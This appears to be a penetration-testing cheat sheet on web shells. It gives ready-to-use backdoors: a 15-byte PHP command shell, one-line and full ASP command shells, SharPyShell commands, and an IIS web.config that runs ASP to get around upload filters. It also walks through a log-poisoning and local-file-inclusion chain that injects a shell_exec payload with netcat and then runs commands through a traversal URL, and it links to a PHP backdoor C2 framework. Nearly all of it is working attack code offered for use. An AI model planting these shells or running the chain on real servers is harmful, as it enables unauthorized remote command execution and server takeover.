Webshell

Webshell

PHP 15 bytes shell

1
<?=`$_GET[0]`?>
Copied!

Asp/Aspx

One Line ASP Shell
1
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Copied!
Request with: http://target/shell.asp?cmd=ipconfig
SharPyShell: SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications.
1
python SharPyShell.py generate -p somepassword
2
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
Copied!

Running web.config as an ASP file

Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes:
1
<?xml version="1.0" encoding="UTF-8"?>
2
<configuration>
3
<system.webServer>
4
<handlers accessPolicy="Read, Script, Write">
5
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
6
</handlers>
7
<security>
8
<requestFiltering>
9
<fileExtensions>
10
<remove fileExtension=".config" />
11
</fileExtensions>
12
<hiddenSegments>
13
<remove segment="web.config" />
14
</hiddenSegments>
15
</requestFiltering>
16
</security>
17
</system.webServer>
18
</configuration>
19
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
20
<%
21
Response.write("-"&"->")
22
' it is running the ASP code if you can see 3 by opening the web.config file!
23
Response.write(1+2)
24
Response.write("<!-"&"-")
25
%>
26
-->
Copied!
webshell/fuzzdb-webshell/asp at master · tennc/webshell
GitHub
Examples of asp webshells.
1
<?xml version="1.0" encoding="UTF-8"?>
2
<configuration>
3
<system.webServer>
4
<handlers accessPolicy="Read, Script, Write">
5
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
6
</handlers>
7
<security>
8
<requestFiltering>
9
<fileExtensions>
10
<remove fileExtension=".config" />
11
</fileExtensions>
12
<hiddenSegments>
13
<remove segment="web.config" />
14
</hiddenSegments>
15
</requestFiltering>
16
</security>
17
</system.webServer>
18
</configuration>
19
20
<%
21
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
22
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
23
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
24
Function getCommandOutput(theCommand)
25
Dim objShell, objCmdExec
26
Set objShell = CreateObject("WScript.Shell")
27
Set objCmdExec = objshell.exec(thecommand)
28
getCommandOutput = objCmdExec.StdOut.ReadAll
29
end Function
30
%>
31
32
<FORM action="" method="GET">
33
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
34
<input type="submit" value="Run">
35
</FORM>
36
<PRE>
37
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
38
<%Response.Write(Request.ServerVariables("server_name"))%>
39
<p>
40
<b>The server's port:</b>
41
<%Response.Write(Request.ServerVariables("server_port"))%>
42
</p>
43
<p>
44
<b>The server's software:</b>
45
<%Response.Write(Request.ServerVariables("server_software"))%>
46
</p>
47
<p>
48
<b>The server's software:</b>
49
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
50
<% szCMD = request("cmd")
51
thisDir = getCommandOutput("cmd /c" & szCMD)
52
Response.Write(thisDir)%>
53
</p>
54
<br>
Copied!

Log poisoning + LFI + shell

Required: Initial LFI found
😼
Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replacing highlighted data.
We can also try to add via netcat:
1
nc -nv 10.11.1.35 80
2
(UNKNOWN) [10.11.1.35] 80 (http) open
3
<?php echo shell_exec($_GET['cmd']);?>
4
5
HTTP/1.1 400 Bad Request
Copied!
Next, get RCE by adding the cmd parameter:
1
http://10.11.15.137/addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00
Copied!
Get Reverse Shell Through Log Poisoning with the Vulnerability of — LFI ( LOCAL FILE INCLUSION )
Medium
RCE via LFI Log Poisoning - The Death Potion
Medium
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
GitHub